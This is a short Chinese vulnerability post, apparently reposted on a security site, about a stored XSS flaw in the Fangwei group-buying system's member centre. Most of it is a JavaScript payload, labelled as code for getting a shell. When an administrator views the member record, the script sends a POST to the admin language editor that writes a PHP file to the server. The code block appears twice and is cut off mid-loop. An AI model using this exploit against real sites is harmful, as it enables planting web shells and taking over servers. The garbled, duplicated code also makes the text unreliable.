方维团购系统会员中心xss

没穿底裤 2020年1月1日03:40:07评论396 views字数 447阅读1分29秒阅读模式
摘要

个人中心 http://0day5.com//index.php?m=UcModify&a=index

后台查看会员
附上可getshell的代码
[php]
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i

个人中心 http://0day5.com//index.php?m=UcModify&a=index
方维团购系统会员中心xss
后台查看会员
方维团购系统会员中心xss

附上可getshell的代码
[php]
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;

getshell();
function getshell(){

var postStr="lang=en-us&lang_file=/1.php&lang_file_content=";

xmlhttp.open("POST", "admin.php?m=Editor&a=updateLang&", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);
}
[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日03:40:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   方维团购系统会员中心xsshttps://cn-sec.com/archives/75495.html

发表评论

匿名网友 填写信息